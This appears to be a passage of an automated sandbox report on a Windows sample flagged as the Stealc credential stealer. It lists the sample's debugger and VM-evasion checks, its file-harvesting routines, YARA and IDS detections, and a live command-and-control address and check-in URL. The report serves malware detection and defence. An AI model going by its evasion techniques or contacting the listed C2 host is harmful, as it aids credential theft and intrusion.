                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F02F second address: B5F041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C7Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F041 second address: B5F052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79ACh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5EBB7 second address: B5EBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60BEB second address: B60BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8489E second address: A848A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8D1AF4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A9ED3C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AFC7ED instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006838B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00684910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00684910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0067DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0067E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00684570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00684570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0067ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0067BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0067DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006716D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00683EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00683EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0067F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00671160 GetSystemInfo,ExitProcess,0_2_00671160
                Source: file.exe, file.exe, 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1367632682.0000000001314000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1367632682.00000000012E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1367632682.0000000001314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
                Source: file.exe, 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13573
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13570
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13592
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13584
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13624
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006745C0 VirtualProtect ?,00000004,00000100,000000000_2_006745C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00689860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00689860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00689750 mov eax, dword ptr fs:[00000030h]0_2_00689750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00687850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00687850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7500, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00689600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00689600
                Source: file.exe, file.exe, 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: cProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00687B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00686920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00686920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00687850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00687850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00687A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00687A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.670000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1325704313.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7500, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.670000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1325704313.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7500, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php(#file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpofile.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/wsfile.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37wfile.exe, 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpSfile.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpGfile.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.37
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1533401
                          Start date and time:2024-10-14 17:17:08 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 11s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:9
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 87
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.947602937319869
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'847'296 bytes
                          MD5:bf6de6e8d3ac5123b66ba93633affe66
                          SHA1:f5f047a51c8ffe5700542d6ea9517214d4f31725
                          SHA256:eb01ca908e0cad8310d771a3722cad18d9694c718c37ac5f363e476e1c1212de
                          SHA512:5f81468fb04d9345655f76ab1983b9f53ccb3321418902eb652bc899aeb9afb95687447fc78d3a8d44f49eb7503c7df7d9d7e04c384a4164e64f49fed4b3041e
                          SSDEEP:49152:5EQVzI8pSb+ZmlSNePyEYpjzTi0yxTZ1:RBpBZneKTjv
                          TLSH:E1853353BB56306DD6FDE1B30CC076ACDC38026667926B6F3C610554B82F609EB8E6D8
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0xa98000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007F0B44C9665Ah
                          femms
                          sbb al, 00h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          jmp 00007F0B44C98655h
                          add byte ptr [ecx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dl
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [esi], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          or al, byte ptr [eax]
                          add byte ptr [esi], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], cl
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          push es
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x25b0000x228008475d625e3f7c5b43151555c5826c501unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x25e0000x29c0000x20028fdc08b1eb4d51e1e52a2b43a10c155unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          jmwhdghu0x4fa0000x19d0000x19ce00ba098c1c8c6d9c55ec9a6563feb9566cFalse0.9950985609673024data7.9544342173463365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          xkdnzbup0x6970000x10000x400cd261ec749ad0438a328e048d81f69a8False0.7744140625data6.070382761997643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x6980000x30000x220049ae221218d0f9b38a31d0a6680d7b8aFalse0.06066176470588235DOS executable (COM)0.8011941068887273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Imports

                          DLLImport
                          kernel32.dlllstrcpy

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-10-14T17:18:15.099274+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749708185.215.113.3780TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 14, 2024 17:18:14.141050100 CEST4970880192.168.2.7185.215.113.37
                          Oct 14, 2024 17:18:14.145940065 CEST8049708185.215.113.37192.168.2.7
                          Oct 14, 2024 17:18:14.146003962 CEST4970880192.168.2.7185.215.113.37
                          Oct 14, 2024 17:18:14.146800995 CEST4970880192.168.2.7185.215.113.37
